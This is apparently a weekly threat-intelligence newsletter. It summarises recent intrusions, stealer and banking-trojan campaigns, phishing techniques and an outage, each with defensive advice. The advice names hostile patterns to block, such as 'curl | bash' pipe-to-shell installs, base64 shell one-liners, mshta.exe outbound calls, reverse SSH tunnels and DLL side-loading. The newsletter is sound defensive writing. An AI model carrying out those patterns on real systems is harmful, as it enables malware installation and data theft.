Threat Newsletter March 16, 2026

This week's threat intel highlights multiple campaigns abusing trusted infrastructure and user habits to steal data and gain access. These include fake GitHub download pages and cloned install docs that trick people into running malicious commands. We cover major disruption events—the FBI system investigation and Stryker's global outage—to show how quickly incidents can impact sensitive data and business operations. We also review evolving phishing techniques, including .arpa-based redirect hosting and impersonation of local government officials targeting permit applicants. Finally, we touch on broader trends: geopolitical cyber spillover, new regional banking malware, ransomware leak-site pressure, and government and regulatory moves to counter fraud and reduce AI-agent risk.

Suspicious Activity Detected on FBI Network System Holding Law Enforcement Sensitive Data

The FBI is investigating suspicious activity on an internal system that holds sensitive information related to surveillance operations and investigations.

Key Takeaways

❗What Happened: FBI found and addresses suspicious cyber activity on an internal system and opened an investigation.

💡Why it matters: Even through the system is unclassified, it contains highly sensitive investigative and surveillance related information plus PII.

📋Notable Detail: The activity reportedly leveraged commercial ISP vendor infrastructure, suggesting a potentially well-resourced operator or clever operational security.

BoryptGrab: New Windows Stealer Delivered Through Malicious GitHub Download Pages

Trend Micro reports a malware campaign distributing a newly identified Windows stealer called BoryptGrab through deceptive, SEO-optimized GitHub repositories and fake download sites that mimic GitHub Pages.

Key Takeaways

❗Primary Risk: Credential and data theft (browser data, passwords, crypto wallet data, Telegram info and Discord tokens. In addition, the malware is able to do screenshots and collect files.

📨 Distribution: Victims are lured to fake GitHub repos and GitHub Pages downloading ZIP files that masquerade as popular “free tools”. Once executed, the infection chain can deploy multiple payloads, including the BoryptGrab stealer and a PyInstaller backdoor called TunnesshClient.

🛡️ Defense:

Do not download “free tools” from random GitHub repos or GitHub Pages. Only use official vendor sites or an approved software catalog
Block or warn on downloads from github.io (and other newly seen “download” domains) in your web filter.
Prevent running files from ZIPs in Downloads/Temp. If possible, block executables and scripts from user-writable folders.
Lock down scripts: disable or restrict PowerShell and Windows Script Host (VBS via wscript.exe / cscript.exe) for non-admin users.
Alert/block outbound SSH from workstations. Reverse SSH tunnels should be rare for normal users.

Threat actors Turn .arpa into a Phishing Redirect and Hosting Layer

Infoblox reports a phishing campaign abusing the .arpa top-level domain—normally reserved for reverse DNS lookups, not web content.

Key Takeaways

👊 Attack: Threat actors are using .arpa (reverse DNS) names as phishing links and hosting, which can bypass basic domain reputation assumptions.

Harder for users to spot: Links may show reverse DNS-looking strings instead of normal domains, and the real destination is obscured through redirects.

❗Defender Challenge: Because .arpa is “infrastructure-like” and rarely blocked, it can slip past allowlists and filtering rules that focus on typical web TLDs.

🥷Cloudflare used as cover: Resolved domains pointed into Cloudflare’s edge network, hiding the true hosting location and complicating take down and blocking.

🛡️Defense:

Treat .arpa links as suspicious in email. Flag or quratine messages containing URLs that end in .arpa or include long reverse-DNS style hostnames.
Block web traffic to .arpa domains at the proxy/DNS layer. In normal enterprise use, .arpa should not be serving web pages.
Add URL rewrite and detonation for .arpa clicks. If a user clicks, force the link through your secure web gateway sandbox first.
Monitor for CNAME hijack/ domain shadowing indicators.
- Alert on unexpected CNAME changes for your domains.
- Enforce MFA and strong admin controls for DNS provider accounts.

InstallFix Attack: Cloned Claude Code Docs Trick Users into Running Malware

Threat actors are running an "InstallFix" campaign using cloned installation guides for Claude Code (Anthropic's CLI) to trick users into copying and running malicious install commands.

❗Technique: “InstallFix” is a variation of ClickFix that abuses the habit of running copy/paste install commands.

🚪 Initial Access: Sponsored search ads lead to convincing clones of real install documentation pages.

🪲 Payload: The campaign delivers Amatera Stealer, aimed at stealing credentials and other sensitive data.

🛡️Defense:

Do not copy/paste install commands from ads or search results. Go to the vendor’s official site from a bookmark or a known-good link.
Skip sponsored results. Train users to avoid “Sponsored” entries when searching for install instructions.
Block common installer abuse patterns:
- macOS/Linux: block or warn on curl | bash and base64-decoded shell one-liners from the internet.
- Windows: alert/block mshta.exe making outbound connections or spawning unusual child processes.
Use application allowlisting for developer tools. Only allow approved installers and package managers
MFA everywhere + session token protection. Infostealers target browser sessions, so protect key accounts and enforce re-auth for risky actions.

UK Forms Cross-Sector Cyber Fraud Squad to Block Scams and Freeze Criminal Accounts

The UK government is launching a new Online Crime Center in April to coordinate a national response to cyber-enabled fraud.

Key Takeaways

❗New Cyber Group: A dedicated Online Crime Center starts in April to coordinate action against cyber fraud.

💡Who’s involved: Police, intelligence, banks, mobile carriers, and big tech are working together with shared data.

⭐ Objective: Identify and take down scam websites, accounts, phone numbers, and social media scam pages.

💡Why now: Fraud is widespread in the UK and much of it is believed to originate outside the country, requiring international coordination.

FBI Warns of Phishing Impersonating City and County Officials

The FBI is warning about phishing scams in which criminals impersonate U.S. city and county planning or zoning officials to target people and businesses applying for land-use, planning, or zoning permits.

Key Takeaways

🎯 Who is being targeted: Anyone with active city/county planning or zoning permit application.

📋How the scam works: Emails impersonate officials and request permit fees, using real permit details to sound legitimate.

Payment methods are a red flag: The scammers push payment via wire, P2P payments, or crypto.

❗Common indicators: Messages from non-government domains, suspicious attachments, and urgency tactics to avoid “permit delays”.

🛡️ Defense: Verify the sender domain and call the city/county directly (using a known phone number) before paying anything. Report to IC3 if targeted or victimized.

Regulators Caution Against OpenClaw Deployment Across Banks and Government

Reuters reports that some Chinese government agencies and state-owned enterprises have warned staff not to install OpenClaw, an open-source AI agent, on office devices due to security and data concerns.

Key Takeaways

🚨 Whats Happening: Some Chinese state agencies and state-owned firms are warning employees not to deploy OpenClaw (in some cases even on personal devices).

⭐Why: Cyber and data security concerns tied to autonomous agents with device permissions (risk of leaking, deleting, or misusing data).

💡Not a clear “ban”: The report suggests warnings and curbs, but it’s unclear how broad or strict the restrictions are.

💡Policy Tension: China is pushing “AI plus” adoption, but is also trying to reduce risk as AI agents spread across government and industry.

Stryker Suffers Major Outage After Handala-Claimed Attack

Stryker suffered a highly disruptive cyber incident that caused a global network disruption affecting its Microsoft environment. An Iran-linked group called Handala claimed responsibility, alleging a large-scale destructive attack that included wiping devices and stealing data, though some details remain unverified.

Key Takeaways

🌐 High disruption event: The incident caused a global outage/disruption across Stryker’s environment.

🚨 Destructive-attack claims: Handala claimed mass wiping of devices/systems and large data theft, but these claims may be hard to verify.

🕵️Potential wiper tradecraft: The reporting aligns Handala with destructive activity and possible links to an Iranian state-sponsored cluster (often associated with wiper/extortion tactics).

❗Healthcare supply chain risk: A major medtech supplier being disrupted can create downstream operational impact for hospitals and partners.

Stryker Network Disruption Update: Order Processing Impacted, Investigation Ongoing

Key Takeaways

What happened: Cyberattack led to a global IT/network disruption in Stryker’s Microsoft environment.

❗Impact: The impact is limited to Stryker’s internal Microsoft environment.

🚨 Customer impact: Disruptions to ordering, manufacturing, and shipping, with backlog handling and recovery efforts underway.

💡Product safety message: Stryker says connected products are not impacted and are safe to use, and several cloud/on-prem products are described as architecturally separate from the affected environment.

🛡️ What customers should do: Route questions through local Stryker sales reps for the latest system status and availability updates.

Customer Updates: Stryker Network Disruption

Stryker

Iran-Linked Hackers Expand Targeting to the US as War Drives Cyber Risk

The article warns that pro-Iranian and Iran-aligned hackers are increasing activity during the war, primarily in the Middle East but also beginning to spill over into the United States.

Key Takeaways

💡Cyber spillover is increasing: Conflict is driving more cyber activity, and the US is more likely to see related disruptions.

🎯 Targets will include “high impact” sectors: Defense contractors, government vendors, and critical infrastructure like water, power, hospitals, ports, and rail are highlighted as likely targets.

❗Expect disruptive, not always sophisticated attacks: Website defacements, DDoS, hack-and-leak, and destructive actions are cited as realistic outcomes, especially against under-resourced organizations.

Weak links are most at risk: Smaller utilities and healthcare entities can be targeted because they often lag on patching and basic security controls.

VENON: New Rust Banking Trojan Hits Brazil With Overlay Credential Theft

Key Takeaways

Researchers disclosed a new Rust-based banking malware dubbed VENON targeting Brazilian users. It uses a multi-stage infection chain (including DLL side-loading) and heavy evasion (anti-sandbox, ETW/AMSI bypass) before reaching out for configuration and connecting back to its operator.

Key Takeaways

🪲New banking malware: This is a new Windows banking Trojan written in Rust.

🎯Targets: The malware has been targeting Brazilian users from 33 banks/financial platforms.

🥷 How it Steals: Uses banking overlays triggered by active window/ browser domain monitoring to harvest credentials when a victim visits a targeted site/app.

🚚 Delivery Chain: Reported to involve social engineering and a ZIP download, then DLL side-loading to run the malicious DLL.

🛡️Defense:

Patch and update Windows + browsers so common initial-access exploits and LOLBins are less effective.
Block DLL side-loading abuse where possible:
- Use application control (WDAC/AppLocker/EDR) to allow only trusted signed apps in user-writable paths.
- Flag legitimate apps loading unexpected DLLs from their own folders (especially after running from a ZIP/extracted directory).
Reduce credential value if stolen
- Enforce MFA on banking/finance and email accounts.
- Prefer FIDO2/passkeys where possible.
- Limit saved passwords and disable “remember me” on high-risk accounts.

Ransomware Gang AiLock Threatens England Hockey Data Leak

England Hockey is investigating a potential incident after the AiLock ransomware group listed the organization on its leak site and claimed to have stolen 129GB of data.

Key Takeaways

🕵️Claimed Actor: AiLock ransomware group listed England Hockey on its data leak site and stole 129GB of data.

💡Status: England Hockey is investigating and has not confirmed what data was impacted yet.

❗Response: Working with external experts and relevant authorities.

📈 Practical risk of members: Increased likelihood of phishing or suspicious account activity if data is exposed, so users should be extra cautious with unexpected emails/messages.